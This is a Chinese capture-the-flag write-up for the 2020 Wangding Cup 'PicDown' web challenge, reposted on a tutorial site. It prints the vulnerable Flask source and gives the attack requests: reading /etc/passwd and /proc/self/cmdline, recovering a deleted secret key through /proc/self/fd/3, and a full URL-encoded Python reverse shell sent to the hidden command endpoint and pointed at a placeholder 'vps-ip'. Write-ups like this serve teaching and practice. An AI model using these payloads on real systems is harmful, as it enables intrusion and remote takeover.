栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

[网鼎杯 2020 白虎组]PicDown

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

[网鼎杯 2020 白虎组]PicDown

[网鼎杯 2020 白虎组]PicDown
    文件读取/proc反弹shell

任意文件读

/page?url=/etc/passwd

读取开启当前进程的命令

/page?url=/proc/self/cmdline
# 结果 python2 app.py

读取 app.py

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

需要获取 /tmp/secret.txt 文件内容,然而被删除了,用 /proc/self/fd/3 读取到 secret.txt,/proc/self/fd/ 这个目录包含当前进程打开过的文件

/page?url=/proc/self/fd/3
# 结果 vLFpmnWL6xdcPOO7oHdgyRtPO15CGqK0B/8biLwVYnM=

反弹 shell

nc -lvnp 80

/no_one_know_the_manager?key=vLFpmnWL6xdcPOO7oHdgyRtPO15CGqK0B/8biLwVYnM=&shell=python%20-c%20%22import%20os%2Csocket%2Csubprocess%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect(('vps-ip'%2C80))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B'%2Fbin%2Fbash'%2C'-i'%5D)%3B%22

读取 flag

/page?url=/flag
转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/738108.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号